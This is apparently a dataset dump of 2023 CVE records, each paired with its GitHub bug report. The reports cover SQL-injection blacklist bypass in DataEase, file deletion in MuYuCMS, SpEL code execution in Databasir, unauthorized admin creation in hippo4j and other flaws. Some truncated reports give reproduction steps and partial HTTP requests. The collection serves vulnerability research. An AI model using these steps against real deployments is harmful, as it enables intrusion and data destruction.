cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2023-28437
2023-03-25T00:15:08.243
Dataease is an open source data visualization and analysis tool. The blacklist for SQL injection protection is missing entries. This vulnerability has been fixed in version 1.18.5. There are no known workarounds.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/dataease/dataease/issues/4795" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes" ], "url": "https:...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*", "matchCriteriaId": "2A6525A4-9AFC-4166-83A7-7986DA122308", "versionEndExcluding": "1.18.5", "versionEndIncluding": null, "versionStartExcl...
[ "89" ]
89
https://github.com/dataease/dataease/issues/4795
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "dataease", "dataease" ]
**DataEase 版本** v1.18.4 **Bug 描述** sql编写不规范导致SQL注入,防御SQL注入的关键字黑名单有遗漏,可以用黑名单之外的的方法进行注入 **Bug 重现步骤** 1. 接口/api/sys_msg/list/1/10,漏洞参数orders,插入单引号后sql报错 ![image](https://user-images.githubusercontent.com/94107024/225573776-6c62d5e8-317f-44bf-8420-8471595cb7b5.png) 2 由于src/main/java/io/dataease/ext/ExtSysMsgMa...
[Bug] sql编写不规范导致SQL注入,防御SQL注入的关键字黑名单会被绕过
https://api.github.com/repos/dataease/dataease/issues/4795/comments
2
2023-03-16T09:40:53Z
2023-03-24T01:28:58Z
https://github.com/dataease/dataease/issues/4795
1,627,070,238
4,795
4,888
CVE-2023-28858
2023-03-26T19:15:06.780
redis-py before 4.5.3 leaves a connection open after canceling an async Redis command at an inopportune time, and can send response data to the client of an unrelated request in an off-by-one manner. NOTE: this CVE Record was initially created in response to reports about ChatGPT, and 4.3.6, 4.4.3, and 4.5.3 were relea...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integri...
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/redis/redis-py/compare/v4.3.5...v4.3.6" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/redis/redis-py/compare/v4.4.2...v4.4.3" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redis:redis-py:*:*:*:*:*:*:*:*", "matchCriteriaId": "01B96893-5078-47C0-A2F2-D1039A45152D", "versionEndExcluding": "4.3.6", "versionEndIncluding": null, "versionStartExcludin...
[ "193" ]
193
https://github.com/redis/redis-py/issues/2624
[ "Issue Tracking" ]
github.com
[ "redis", "redis-py" ]
**Version**: 4.5.1 **Platform**: Python 3.8 / Ubuntu (but really, any platform will likely suffer the same issue) **Description**: Canceling async Redis command leaves connection open, in unsafe state for future commands The issue here is really the same as #2579, except that it generalizes it to all comma...
Off by 1 - Canceling async Redis command leaves connection open, in unsafe state for future commands
https://api.github.com/repos/redis/redis-py/issues/2624/comments
7
2023-03-17T13:37:42Z
2023-06-24T08:54:44Z
https://github.com/redis/redis-py/issues/2624
1,629,335,140
2,624
4,889
CVE-2023-28859
2023-03-26T19:15:06.850
redis-py before 4.4.4 and 4.5.x before 4.5.4 leaves a connection open after canceling an async Redis command at an inopportune time, and can send response data to the client of an unrelated request. (This could, for example, happen for a non-pipeline operation.) NOTE: the solutions for CVE-2023-28859 address data leaka...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/redis/redis-py/issues/2665" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/redis/redi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redis:redis-py:*:*:*:*:*:*:*:*", "matchCriteriaId": "8BF5D290-49BC-4C70-B801-9DCE97070663", "versionEndExcluding": "4.4.4", "versionEndIncluding": null, "versionStartExcludin...
[ "459" ]
459
https://github.com/redis/redis-py/issues/2665
[ "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "redis", "redis-py" ]
**Version**: 4.5.3 **Platform**: Python 3.8 on Ubuntu / Generic **Description**: Canceling async Redis command leaves connection open, in unsafe state for future commands This is a reincarnation of #2624, which was closed with an incomplete fix and a possibly unreliable test case. This is the same issue tha...
Canceling async Redis command leaves connection open, in unsafe state for future commands
https://api.github.com/repos/redis/redis-py/issues/2665/comments
22
2023-03-25T17:55:23Z
2023-06-27T09:43:48Z
https://github.com/redis/redis-py/issues/2665
1,640,603,645
2,665
4,890
CVE-2023-27096
2023-03-27T14:15:08.033
Insecure Permissions vulnerability found in OpenGoofy Hippo4j v.1.4.3 allows attacker to obtain sensitive information via the ConfigVerifyController function of the Tenant Management module.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/opengoofy/hippo4j/issues/1060" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Adv...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opengoofy:hippo4j:1.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "8FDE6062-50F4-4276-8D27-337745FF8AF1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "732" ]
732
https://github.com/opengoofy/hippo4j/issues/1060
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "opengoofy", "hippo4j" ]
UserController for the Tenant Management module module of hippo4j. An unauthorized access vulnerability arises from the newly added tenant information AddUser method to perform the current operation of user authentication, leads to any user can access hippo4j/v1 / cs/auth/users/add interface new super administrator pr...
[Bug] Hippo4j monitors unauthorized access vulnerabilities
https://api.github.com/repos/opengoofy/hippo4j/issues/1060/comments
0
2023-02-20T08:59:53Z
2023-09-01T08:28:49Z
https://github.com/opengoofy/hippo4j/issues/1060
1,591,420,797
1,060
4,891
CVE-2023-0241
2023-03-27T21:15:10.147
pgAdmin 4 versions prior to v6.19 contains a directory traversal vulnerability. A user of the product may change another user's settings or alter the database.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "inte...
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/pgadmin-org/pgadmin4/issues/5734" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://jvn.jp/en/jp/JVN01...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:postgresql:pgadmin_4:*:*:*:*:*:*:*:*", "matchCriteriaId": "4EC61F67-FCC9-4152-841C-CC9E21D484E3", "versionEndExcluding": "6.19", "versionEndIncluding": null, "versionStartExc...
[ "22" ]
22
https://github.com/pgadmin-org/pgadmin4/issues/5734
[ "Issue Tracking", "Patch" ]
github.com
[ "pgadmin-org", "pgadmin4" ]
**Describe the bug** pgAdmin users who are authenticated can access each other's directories and files by providing relative paths. **To Reproduce** Steps to reproduce the behavior: 1. Start pgAdmin in the Server mode. You need to create two users 'user1@xyz.com' and 'user2@xyz.com'. 2. Login as user1 and expo...
pgAdmin users who are authenticated can access each other's directories and files by providing relative paths
https://api.github.com/repos/pgadmin-org/pgadmin4/issues/5734/comments
1
2023-01-13T06:52:18Z
2023-01-17T08:04:13Z
https://github.com/pgadmin-org/pgadmin4/issues/5734
1,531,801,105
5,734
4,892
CVE-2023-26924
2023-03-27T22:15:21.967
LLVM a0dab4950 has a segmentation fault in mlir::outlineSingleBlockRegion. NOTE: third parties dispute this because the LLVM security policy excludes "Language front-ends ... for which a malicious input file can cause undesirable behavior."
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Colloportus0/fc16d10d74aedf89d5d1d020ebb89c0c" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https:/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:llvm:llvm:2023-01-22:*:*:*:*:*:*:*", "matchCriteriaId": "71350E43-57E7-48F3-AD46-043D4988D2BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "120" ]
120
https://github.com/llvm/llvm-project/issues/60216
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "llvm", "llvm-project" ]
MLIR built at commit https://github.com/llvm/llvm-project/commit/a0dab4950 Reproduced with: ```shell mlir-opt --test-scf-if-utils temp.mlir ``` `temp.mlir`: ```mlir func.func @func( %arg0: index, %arg1: index, %arg2: index, %arg3: memref<2xf32>) -> memref<2xf32> { %0 = memref.alloc() : memref<2x...
[mlir] `mlir::outlineSingleBlockRegion` crashes with segmentation fault.
https://api.github.com/repos/llvm/llvm-project/issues/60216/comments
10
2023-01-22T17:08:45Z
2023-08-02T16:45:00Z
https://github.com/llvm/llvm-project/issues/60216
1,552,201,934
60,216
4,893
CVE-2023-27700
2023-03-28T01:15:10.577
MuYuCMS v2.2 was discovered to contain an arbitrary file deletion vulnerability via the component /accessory/picdel.html.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/MuYuCMS/MuYuCMS/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:muyucms_project:muyucms:2.2:*:*:*:*:*:*:*", "matchCriteriaId": "AFED72CC-F677-4F0C-9412-FBA439ABAD0C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
[ "22" ]
22
https://github.com/MuYuCMS/MuYuCMS/issues/8
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "MuYuCMS", "MuYuCMS" ]
Vulnerability exists in picdel.html 1、 We put a txt file in the root of our website with the file name test.txt. 2、Constructing packets after logging into the backend ``` POST /admin.php/accessory/picdel.html HTTP/1.1 Host: test.test Content-Length: 54 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: M...
MuYucms picdel.html has Arbitrary file deletion vulnerability
https://api.github.com/repos/MuYuCMS/MuYuCMS/issues/8/comments
1
2023-02-27T08:40:09Z
2023-04-24T01:42:11Z
https://github.com/MuYuCMS/MuYuCMS/issues/8
1,600,726,595
8
4,894
CVE-2023-27701
2023-03-28T14:15:07.450
MuYuCMS v2.2 was discovered to contain an arbitrary file deletion vulnerability via the component /database/sqldel.html.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/MuYuCMS/MuYuCMS/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/MuYuCMS/Mu...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:muyucms:muyucms:2.2:*:*:*:*:*:*:*", "matchCriteriaId": "E558AF9C-EBCD-4299-94C6-E32EC2D9C336", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "862" ]
862
https://github.com/MuYuCMS/MuYuCMS/issues/9
[ "Exploit", "Issue Tracking" ]
github.com
[ "MuYuCMS", "MuYuCMS" ]
Vulnerability exists in sqldel.html 1、 We put a txt file in the root of our website with the file name test.txt. 2、Constructing packets after logging into the backend ``` POST /admin.php/database/sqldel.html HTTP/1.1 Host: test.test Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://test.test ...
MuYucms sqldel.html has Arbitrary file deletion vulnerability
https://api.github.com/repos/MuYuCMS/MuYuCMS/issues/9/comments
1
2023-02-27T09:02:58Z
2023-04-24T01:41:21Z
https://github.com/MuYuCMS/MuYuCMS/issues/9
1,600,758,835
9
4,895
CVE-2023-26923
2023-03-28T15:15:06.933
Musescore 3.0 to 4.0.1 has a stack buffer overflow vulnerability that occurs when reading misconfigured midi files. If attacker can additional information, attacker can execute arbitrary code.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrity...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/musescore/MuseScore/issues/16346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/mu...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:musescore:musescore:*:*:*:*:*:*:*:*", "matchCriteriaId": "3B9C65BD-6EF2-45F2-8FB7-54B87F63DF87", "versionEndExcluding": null, "versionEndIncluding": "4.0.1", "versionStartExc...
[ "787" ]
787
https://github.com/musescore/MuseScore/issues/16346
[ "Exploit", "Issue Tracking" ]
github.com
[ "musescore", "MuseScore" ]
**Describe the bug** It only affects the Windows version. In src/importexport/midi/internal/midishared/midifile.cpp ```cpp void MidiFile::skip(qint64 len) { // Note: if MS is updated to use Qt 5.10, this can be implemented with QIODevice::skip(), which should be more efficient // as bytes do not ne...
[MU4 Issue] Stack buffer overflow vulnerability while parse MIDI file
https://api.github.com/repos/musescore/MuseScore/issues/16346/comments
8
2023-02-13T14:23:48Z
2023-03-29T09:26:30Z
https://github.com/musescore/MuseScore/issues/16346
1,582,447,704
16,346
4,896
CVE-2023-27821
2023-03-28T17:15:12.293
Databasir v1.0.7 was discovered to contain a remote code execution (RCE) vulnerability via the mockDataScript parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/luelueking/Databasir-1.0.7-vuln-poc" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:databasir:databasir:1.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "DFE4F93A-FF0A-4C76-A3C9-03BED4938A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "917" ]
917
https://github.com/vran-dev/databasir/issues/269
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "vran-dev", "databasir" ]
### 影响 Databasir is a team-oriented relational database model document management platform. Databasir 1.0.7 has remote code execution vulnerability. Remote code execution vulnerability is a Web security vulnerability, we can execute any command, such as `open -a Calculator` ### 不安全的代码 `SpelScriptEvaluator`使用...
database-1.0.7 存在RCE漏洞
https://api.github.com/repos/vran-dev/databasir/issues/269/comments
0
2023-02-13T05:19:10Z
2023-03-03T13:15:58Z
https://github.com/vran-dev/databasir/issues/269
1,581,679,192
269
4,897
CVE-2023-28643
2023-03-30T19:15:06.607
Nextcloud server is an open source home cloud implementation. In affected versions when a recipient receives 2 shares with the same name, while a memory cache is configured, the second share will replace the first one instead of being renamed to `{name} (2)`. It is recommended that the Nextcloud Server is upgraded to 2...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integr...
[ { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-hhq4-4pr8-wm27" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*", "matchCriteriaId": "06D75B2D-F295-44BB-8189-8A48F88EEBEF", "versionEndExcluding": "24.0.9", "versionEndIncluding": null, "version...
[ "706" ]
706
https://github.com/nextcloud/server/issues/34015
[ "Exploit", "Issue Tracking" ]
github.com
[ "nextcloud", "server" ]
### ⚠️ This issue respects the following points: ⚠️ - [X] This is a **bug**, not a question or a configuration/webserver/proxy issue. - [X] This issue is **not** already reported on Github _(I've searched it)_. - [X] Nextcloud Server **is** up to date. See [Maintenance and Release Schedule](https://github.com/next...
[Bug]: Name collision of shared folders
https://api.github.com/repos/nextcloud/server/issues/34015/comments
12
2022-09-11T09:12:18Z
2023-03-01T06:15:06Z
https://github.com/nextcloud/server/issues/34015
1,368,883,194
34,015
4,898
CVE-2023-1746
2023-03-30T23:15:06.583
A vulnerability, which was classified as problematic, was found in Dreamer CMS up to 3.5.0. Affected is an unknown function of the component File Upload Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-224634 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", ...
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/iteachyou-wjn/dreamer_cms/issues/11" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.co...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dreamer_cms_project:dreamer_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "0C1C7C40-7926-43C6-A5FD-BDA75DD02CAA", "versionEndExcluding": null, "versionEndIncluding": "3.5.0", "ver...
[ "79" ]
79
https://github.com/iteachyou-wjn/dreamer_cms/issues/11
[ "Exploit", "Third Party Advisory" ]
github.com
[ "iteachyou-wjn", "dreamer_cms" ]
Hello, I'm a penetration test engineer I found that the upload function point of the interface did not verify the suffix or content of the uploaded file, resulting in the arbitrary upload of maliciously constructed content for xss hijacking. ![image](https://user-images.githubusercontent.com/64942080/226236492-78cd32...
Arbitrary file upload vulnerability
https://api.github.com/repos/iteachyou-wjn/dreamer_cms/issues/11/comments
1
2023-03-20T02:59:18Z
2023-04-11T06:49:05Z
https://github.com/iteachyou-wjn/dreamer_cms/issues/11
1,631,290,156
11
4,899
CVE-2022-4899
2023-03-31T20:15:07.213
A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/facebook/zstd/issues/3200" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:facebook:zstandard:1.4.10:*:*:*:*:*:*:*", "matchCriteriaId": "018AE117-915E-4641-8395-E706D0BDBE55", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "400" ]
400
https://github.com/facebook/zstd/issues/3200
[ "Issue Tracking", "Patch" ]
github.com
[ "facebook", "zstd" ]
In the file `programs/util.c`, the function `mallocAndJoin2Dir` has the following [code](https://github.com/facebook/zstd/blob/43f21a600ec431aa615b09868f1f586b949607fb/programs/util.c#L871): ``` static char* mallocAndJoin2Dir(const char *dir1, const char *dir2) { const size_t dir1Size = strlen(dir1); cons...
Buffer overrun can happen in util.c
https://api.github.com/repos/facebook/zstd/issues/3200/comments
1
2022-07-18T05:52:00Z
2023-04-12T06:41:40Z
https://github.com/facebook/zstd/issues/3200
1,307,438,543
3,200
4,900
CVE-2023-26112
2023-04-03T05:15:07.753
All versions of the package configobj are vulnerable to Regular Expression Denial of Service (ReDoS) via the validate function, using (.+?)\((.*)\). **Note:** This is only exploitable in the case of a developer, putting the offending value in a server side configuration file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integri...
[ { "source": "report@snyk.io", "tags": [ "Issue Tracking" ], "url": "https://github.com/DiffSK/configobj/issues/232" }, { "source": "report@snyk.io", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6BO4RLMYEJOD...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:configobj_project:configobj:*:*:*:*:*:*:*:*", "matchCriteriaId": "712117B4-DF06-4167-8EE1-1244D60A1C11", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
[ "1333" ]
1333
https://github.com/DiffSK/configobj/issues/232
[ "Issue Tracking" ]
github.com
[ "DiffSK", "configobj" ]
The affected code is located in [validate.py-line660](https://github.com/DiffSK/configobj/blob/a58c2f4de0e9e854daa67fec630506e5a461eea9/src/configobj/validate.py#L660). It uses the vulnerable regular expression `(.+?)\((.*)\)`. When the match fails, it will cause catastrophic backtracking. I trigger the vulnerability ...
A ReDoS vulnerability exists in ./src/configobj/validate.py
https://api.github.com/repos/DiffSK/configobj/issues/232/comments
10
2023-01-27T12:20:20Z
2024-09-17T11:25:29Z
https://github.com/DiffSK/configobj/issues/232
1,559,673,103
232
4,901
CVE-2023-28834
2023-04-03T17:15:06.883
Nextcloud Server is an open source personal cloud server. Nextcloud Server 24.0.0 until 24.0.6 and 25.0.0 until 25.0.4, as well as Nextcloud Enterprise Server 23.0.0 until 23.0.11, 24.0.0 until 24.0.6, and 25.0.0 until 25.0.4, have an information disclosure vulnerability. A user was able to get the full data directory ...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrit...
[ { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-5w64-6c42-rgcv" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "8C96D16D-F7EB-4674-A02A-FD5AC82CAC57", "versionEndExcluding": "23.0.14", "versionEndIncluding": null, ...
[ "212" ]
212
https://github.com/nextcloud/server/issues/33883
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nextcloud", "server" ]
### ⚠️ This issue respects the following points: ⚠️ - [X] This is a **bug**, not a question or a configuration/webserver/proxy issue. - [X] This issue is **not** already reported on Github _(I've searched it)_. - [X] Nextcloud Server **is** up to date. See [Maintenance and Release Schedule](https://github.com/nextclou...
[Bug]: the complete server installation path is visible in cloud/user endpoint
https://api.github.com/repos/nextcloud/server/issues/33883/comments
3
2022-09-02T22:29:21Z
2023-01-23T16:13:28Z
https://github.com/nextcloud/server/issues/33883
1,360,657,500
33,883
4,902
CVE-2023-26916
2023-04-03T22:15:07.060
libyang from v2.0.164 to v2.1.30 was discovered to contain a NULL pointer dereference via the function lys_parse_mem at lys_parse_mem.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/1979" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedorapro...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesnet:libyang:*:*:*:*:*:*:*:*", "matchCriteriaId": "45E8D3A2-7CA5-4C1C-B0EB-6AD5BC13D455", "versionEndExcluding": null, "versionEndIncluding": "2.1.30", "versionStartExcludi...
[ "476" ]
476
https://github.com/CESNET/libyang/issues/1979
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CESNET", "libyang" ]
Hello, I find a null pointer derefence error in `lys_implement()` when I try to fuzz libyang via `lys_parse_mem.c` .In function `lys_implement()`, it doesn't check whether the value of mod->revision is NULL. In some cases, it can be NULL, which leads to the operation of `strcmp(m->revision, mod->revision) > 0` in lin...
`lys_implement`: NULL pointer dereference via `lys_parse_mem`
https://api.github.com/repos/CESNET/libyang/issues/1979/comments
2
2023-02-11T09:30:34Z
2023-04-04T05:33:52Z
https://github.com/CESNET/libyang/issues/1979
1,580,756,777
1,979
4,903
CVE-2023-26855
2023-04-04T02:15:07.113
The hashing algorithm of ChurchCRM v4.5.3 utilizes a non-random salt value which allows attackers to use precomputed hash tables or dictionary attacks to crack the hashed passwords.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ChurchCRM/CRM/issues/6449" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Par...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*", "matchCriteriaId": "C5A21E4C-1CE8-4C97-9374-DD8EBDB942D5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "330" ]
330
https://github.com/ChurchCRM/CRM/issues/6449
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ChurchCRM", "CRM" ]
#### On what page in the application did you find this issue? https://github.com/ChurchCRM/CRM/blob/74042003a7cdad673bf56c7b6b43a0dabb3ac367/src/ChurchCRM/model/ChurchCRM/User.php#L109 #### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows? Windows/xampp #### What browser (an...
Weak Salt Implementation
https://api.github.com/repos/ChurchCRM/CRM/issues/6449/comments
1
2023-02-12T14:43:47Z
2023-02-16T00:25:20Z
https://github.com/ChurchCRM/CRM/issues/6449
1,581,285,056
6,449
4,904
CVE-2020-19277
2023-04-04T15:15:07.537
Cross Site Scripting vulnerability found in Phachon mm-wiki v.0.1.2 allows a remote attacker to execute arbitrary code via javascript code in the markdown editor.
